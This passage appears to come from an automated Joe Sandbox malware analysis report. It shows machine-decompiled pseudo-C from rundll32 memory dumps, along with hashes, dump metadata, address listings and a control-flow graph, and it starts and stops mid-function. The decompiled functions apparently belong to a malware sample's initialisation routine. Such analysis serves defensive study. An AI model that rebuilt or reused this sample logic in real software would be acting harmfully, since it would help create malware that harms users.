                                                                                                                                                                                                                                    				_t13 = E04C324E1(_a4, _a8, _a12, 1); // executed
                                                                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                                                                                                                                                                                                    • Instruction ID: 28cf19cd797aa6c8156ff40d48a3eca7cf2260302c3701e8bbd86ec869088f2a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90b6b9d0705f26a6a4bbf97f0610232ae6848281c215c8379ed21e7059452824
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DEE04FB2104208FFEF11EF90CC01FAE7B6AEB08349F008055FB1495050D7B2DA20EB94
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E04C3A66E(void* __edx, void* __edi, char _a4) {
                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t7 = E04C37323(__edx, __edi, _a4,  &_a4); // executed
                                                                                                                                                                                                                                    				_t12 = _t7;
                                                                                                                                                                                                                                    				if(_t12 != 0) {
                                                                                                                                                                                                                                    					_push(_t12);
                                                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                                                    					_push(__edi);
                                                                                                                                                                                                                                    					L04C35544();
                                                                                                                                                                                                                                    					 *((char*)(_t12 + __edi)) = 0;
                                                                                                                                                                                                                                    					E04C39039(_t7, _a4);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                    			}






                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction ID: 6a21401bd9ce31c0fa2b92baf772b81ff30ca3ea67ee023449d250fdcad060e3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 10b87d9068704a00f4c0b83e48a122f1ee3d32e81302abe31c4643e426d095cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 40E08672401228B6D7122A94DC40EEF7F6E8F45692F004025FE4849100D632EA10A7E1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3AC81() {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				E04C3ADE5(0x4c3c344, 0x4c3d15c); // executed
                                                                                                                                                                                                                                    				goto __eax;
                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: fc552c4e96c39480be4174ece39f28479235c18f5fddabe720b0cabb1567ecd4
                                                                                                                                                                                                                                    • Instruction ID: 6172547efe2fd1d4fe36d2e35d9d7bae39d88ad9d410c6f8ed1abe43e6b091ce
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc552c4e96c39480be4174ece39f28479235c18f5fddabe720b0cabb1567ecd4
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B012C6368001BF300811052D02C3E031FC0C0E27320C53AB441E4000A4867C191031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E04C3AC9C() {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				E04C3ADE5(0x4c3c344, 0x4c3d158); // executed
                                                                                                                                                                                                                                    				goto __eax;
                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 4f6b93760fff94ab1d9c0597dae7f12d59b01de439e3a9780d3fdc8471203ea9
                                                                                                                                                                                                                                    • Instruction ID: 4cbd4f20dcf05f2ced086aab8974427f6524f5768af576d509355b42992212df
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f6b93760fff94ab1d9c0597dae7f12d59b01de439e3a9780d3fdc8471203ea9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B012C6368101AF308851092C02C3E031FC0C0E27320812AB041D4100E4C67C551031
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e29158095fab5d6c9c9778fa731923d5c82c34639b2daf61834fb77cecac7c60
                                                                                                                                                                                                                                    • Instruction ID: cc746de2a804423832a2d9883ac362d2da82ce443bfccaf036d10ba24a49e28c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e29158095fab5d6c9c9778fa731923d5c82c34639b2daf61834fb77cecac7c60
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33B0123F400100ABDB018B00DD04F19BB21EB54702F004110B20554070C3364C60EB05
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E050A6A56(intOrPtr __eax, void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                    				unsigned int _v24;
                                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                    				unsigned int* _t12;
                                                                                                                                                                                                                                    				signed int _t14;
                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                    				signed int _t17;
                                                                                                                                                                                                                                    				unsigned int _t21;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                                                    				signed int _t31;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t24 = __edx;
                                                                                                                                                                                                                                    				__imp__(0, 0x400000, 0, _t25, _t28, __ecx, __ecx); // executed
                                                                                                                                                                                                                                    				 *0x50ad238 = __eax;
                                                                                                                                                                                                                                    				if(__eax != 0) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					 *0x50ad1a8 = __eax;
                                                                                                                                                                                                                                    					_t11 = E050A8F10(__eax, _a4);
                                                                                                                                                                                                                                    					if(_t11 == 0) {
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t12 =  &_v24;
                                                                                                                                                                                                                                    							__imp__(_t12);
                                                                                                                                                                                                                                    							__imp__();
                                                                                                                                                                                                                                    							_t21 = _v24;
                                                                                                                                                                                                                                    							_t14 = (_t21 << 0x00000020 | _v28) >> 7;
                                                                                                                                                                                                                                    							L050AB226();
                                                                                                                                                                                                                                    							_t31 = _t12 + _t14;
                                                                                                                                                                                                                                    							_t16 = E050A7E03(_a4, _t31);
                                                                                                                                                                                                                                    							_t17 = 2;
                                                                                                                                                                                                                                    							_t23 = _t31;
                                                                                                                                                                                                                                    							__imp__(_t17 << _t31, _t14, _t21 >> 7, 9, 0); // executed
                                                                                                                                                                                                                                    						} while (_t16 == 1);
                                                                                                                                                                                                                                    						if(E050A6B96(_t23) != 0) {
                                                                                                                                                                                                                                    							 *0x50ad260 = 1; // executed
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t11 = E050A225B(_t24); // executed
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t11 = 8;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t11;
                                                                                                                                                                                                                                    			}
















                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: BcN
                                                                                                                                                                                                                                    • API String ID: 0-1407964239
                                                                                                                                                                                                                                    • Opcode ID: 0eb9c8eef66c5332c04678223fd7085894b6a423901980922270dd1c8d15f9e5
                                                                                                                                                                                                                                    • Instruction ID: ca73cd7aa41ca1fbf2ccfbdfeaaca709964f1e925005e47927783c30728996e7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0eb9c8eef66c5332c04678223fd7085894b6a423901980922270dd1c8d15f9e5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34117373A546007AE710ABA4EC0EFAE3AE9EB54750F158529F605C6180EEB5D8418B61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 68531333b30a28e7f77d3a2e26117d41a7c1ef18910ec67c94d72c4690cfcfb3
                                                                                                                                                                                                                                    • Instruction ID: 04438b795a5baa263afffa810bbbaa71969f1c820d81018e07d43c85a1f59f6f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68531333b30a28e7f77d3a2e26117d41a7c1ef18910ec67c94d72c4690cfcfb3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F812772910209AFDB218FA9EC85AEEBBB9FB44300F11416AF515E6250EB349A45CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 29%
                                                                                                                                                                                                                                    			E050A225B(signed int __edx) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                                                    				signed int _t22;
                                                                                                                                                                                                                                    				signed int _t25;
                                                                                                                                                                                                                                    				intOrPtr _t26;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                                                                    				signed int _t32;
                                                                                                                                                                                                                                    				signed int _t41;
                                                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                                                    				signed int _t43;
                                                                                                                                                                                                                                    				signed int _t45;
                                                                                                                                                                                                                                    				intOrPtr _t47;
                                                                                                                                                                                                                                    				intOrPtr* _t49;
                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                    				signed char _t53;
                                                                                                                                                                                                                                    				intOrPtr _t55;
                                                                                                                                                                                                                                    				signed int _t56;
                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                                                    				intOrPtr _t63;
                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t58 = __edx;
                                                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t21 = E050A550E();
                                                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                                                    					_t56 =  *0x50ad25c; // 0x4000000a
                                                                                                                                                                                                                                    					_t52 = (_t56 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    					 *0x50ad25c = (_t56 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t22 =  *0x50ad164(0, 2); // executed
                                                                                                                                                                                                                                    				_v16 = _t22;
                                                                                                                                                                                                                                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                    					_t25 = E050A3D0D( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                    					_t51 = _t25;
                                                                                                                                                                                                                                    					_t26 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    					if( *0x50ad25c > 5) {
                                                                                                                                                                                                                                    						_t8 = _t26 + 0x50ae5cd; // 0x4d283a53
                                                                                                                                                                                                                                    						_t27 = _t8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t7 = _t26 + 0x50aea15; // 0x44283a44
                                                                                                                                                                                                                                    						_t27 = _t7;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E050A1BF4(_t27, _t27);
                                                                                                                                                                                                                                    					_t31 = E050A1B2F(_t58,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                    					if(_t31 == 0) {
                                                                                                                                                                                                                                    						__imp__(_v20);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t59 = 5;
                                                                                                                                                                                                                                    					if(_t51 != _t59) {
                                                                                                                                                                                                                                    						 *0x50ad270 =  *0x50ad270 ^ 0x81bbe65d;
                                                                                                                                                                                                                                    						_t32 = E050A2049(_t31, 0x60);
                                                                                                                                                                                                                                    						__eflags = _t32;
                                                                                                                                                                                                                                    						 *0x50ad32c = _t32;
                                                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                                                    							_push(8);
                                                                                                                                                                                                                                    							_pop(0);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							L050AA7BC();
                                                                                                                                                                                                                                    							_t47 =  *0x50ad32c; // 0x71f95b0
                                                                                                                                                                                                                                    							_t65 = _t65 + 0xc;
                                                                                                                                                                                                                                    							__imp__(_t47 + 0x40, _t32, 0, 0x60);
                                                                                                                                                                                                                                    							_t49 =  *0x50ad32c; // 0x71f95b0
                                                                                                                                                                                                                                    							 *_t49 = 0x50ae836;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                    						_t51 = 0;
                                                                                                                                                                                                                                    						if(0 == 0) {
                                                                                                                                                                                                                                    							__imp__( *0x50ad238, 0, 0x43);
                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                    							 *0x50ad2c4 = 0;
                                                                                                                                                                                                                                    							if(0 == 0) {
                                                                                                                                                                                                                                    								_push(8);
                                                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t53 =  *0x50ad25c; // 0x4000000a
                                                                                                                                                                                                                                    								_t58 = _t53 & 0x000000ff;
                                                                                                                                                                                                                                    								_t55 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    								_t13 = _t55 + 0x50ae55a; // 0x697a6f4d
                                                                                                                                                                                                                                    								_t52 = _t13;
                                                                                                                                                                                                                                    								 *0x50ad120(0, _t13, _t53 & 0x000000ff, _t53 & 0x000000ff, 0x50ac2a7);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                                                                    							_t51 = 0;
                                                                                                                                                                                                                                    							if(0 == 0) {
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								E050A269C( ~_v8 &  *0x50ad270, 0x50ad00c); // executed
                                                                                                                                                                                                                                    								_t41 = E050A4094(_t52); // executed
                                                                                                                                                                                                                                    								_t51 = _t41;
                                                                                                                                                                                                                                    								__eflags = _t51;
                                                                                                                                                                                                                                    								if(_t51 != 0) {
                                                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t42 = E050A96A4(_t52); // executed
                                                                                                                                                                                                                                    								__eflags = _t42;
                                                                                                                                                                                                                                    								if(_t42 != 0) {
                                                                                                                                                                                                                                    									__eflags = _v8;
                                                                                                                                                                                                                                    									_t62 = _v12;
                                                                                                                                                                                                                                    									if(_v8 != 0) {
                                                                                                                                                                                                                                    										L29:
                                                                                                                                                                                                                                    										_t43 = E050A6786(_t58, _t62, _v8); // executed
                                                                                                                                                                                                                                    										_t51 = _t43;
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									__eflags = _t62;
                                                                                                                                                                                                                                    									if(__eflags == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									_t45 = E050A3DD9(__eflags, _t62 + 4); // executed
                                                                                                                                                                                                                                    									_t51 = _t45;
                                                                                                                                                                                                                                    									__eflags = _t51;
                                                                                                                                                                                                                                    									if(_t51 == 0) {
                                                                                                                                                                                                                                    										goto L30;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L29;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_t51 = 8;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t63 = _v12;
                                                                                                                                                                                                                                    						if(_t63 == 0) {
                                                                                                                                                                                                                                    							L30:
                                                                                                                                                                                                                                    							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                    								 *0x50ad160();
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L34;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t64 = _t63 + 4;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    						} while (E050AA501(_t59, _t64, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L30;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t51 = _t22;
                                                                                                                                                                                                                                    					L34:
                                                                                                                                                                                                                                    					return _t51;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}































                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a23e4
                                                                                                                                                                                                                                    0x050a23e9
                                                                                                                                                                                                                                    0x050a23eb
                                                                                                                                                                                                                                    0x050a23f2
                                                                                                                                                                                                                                    0x050a23f6
                                                                                                                                                                                                                                    0x050a23f9
                                                                                                                                                                                                                                    0x050a240e
                                                                                                                                                                                                                                    0x050a2412
                                                                                                                                                                                                                                    0x050a2417
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a2417
                                                                                                                                                                                                                                    0x050a23fb
                                                                                                                                                                                                                                    0x050a23fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a2403
                                                                                                                                                                                                                                    0x050a2408
                                                                                                                                                                                                                                    0x050a240a
                                                                                                                                                                                                                                    0x050a240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a240c
                                                                                                                                                                                                                                    0x050a23ef
                                                                                                                                                                                                                                    0x050a23ef
                                                                                                                                                                                                                                    0x050a23c0
                                                                                                                                                                                                                                    0x050a22fe
                                                                                                                                                                                                                                    0x050a22fe
                                                                                                                                                                                                                                    0x050a2303
                                                                                                                                                                                                                                    0x050a2419
                                                                                                                                                                                                                                    0x050a241d
                                                                                                                                                                                                                                    0x050a2425
                                                                                                                                                                                                                                    0x050a2425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a241d
                                                                                                                                                                                                                                    0x050a2309
                                                                                                                                                                                                                                    0x050a230c
                                                                                                                                                                                                                                    0x050a2316
                                                                                                                                                                                                                                    0x050a231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a242d
                                                                                                                                                                                                                                    0x050a242d
                                                                                                                                                                                                                                    0x050a2431
                                                                                                                                                                                                                                    0x050a2435
                                                                                                                                                                                                                                    0x050a2435

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: ec580547e9faca532cbd6b279fca92a8e4a6a2d6242127fd0e9df785db88193e
                                                                                                                                                                                                                                    • Instruction ID: 4b151c6935b97f7d434e1558890e434d73c5db582cfb5c90b71febe7ae2a2d53
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec580547e9faca532cbd6b279fca92a8e4a6a2d6242127fd0e9df785db88193e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E651DE7BB20616ABDB619BF4F849EAE3BE9BB58700F044436F502D7540FA78D941CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 146 50a3dd9-50a3e1b call 50aa7bc call 50a6a12 151 50a3f69-50a3f6b 146->151 152 50a3e21-50a3e2c 146->152 153 50a3f6c-50a3f72 151->153 155 50a3e33-50a3e35 152->155 156 50a3e3b-50a3e47 call 50aa72d 155->156 157 50a3f5c-50a3f5e 155->157 163 50a3e49 156->163 164 50a3e4c-50a3e5e call 50a809f 156->164 158 50a3f5f-50a3f67 call 50a9039 157->158 158->153 163->164 167 50a3f4b-50a3f4d 164->167 168 50a3e64-50a3e80 call 50a809f 164->168 169 50a3f4e-50a3f53 167->169 173 50a3e82-50a3e9f call 50a6bfa call 50a9039 168->173 174 50a3ea1-50a3ea3 168->174 169->158 172 50a3f55-50a3f5a call 50a1f99 169->172 172->158 178 50a3ea4-50a3ea6 173->178 174->178 180 50a3eac-50a3eb3 178->180 181 50a3f41-50a3f49 call 50a9039 178->181 183 50a3ef4-50a3f1f call 50a8f83 call 50a1c74 180->183 184 50a3eb5-50a3ecc call 50a809f 180->184 181->169 198 50a3f39-50a3f3c call 50a9039 183->198 199 50a3f21-50a3f37 call 50a42ea 183->199 193 50a3ece-50a3eeb call 50a6bfa call 50a9039 184->193 194 50a3eed-50a3eef 184->194 195 50a3ef0-50a3ef2 193->195 194->195 195->181 195->183 198->181 199->198
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E050A3DD9(void* __eflags, char _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char* _v20;
                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                                                                    				char _v76;
                                                                                                                                                                                                                                    				char _v80;
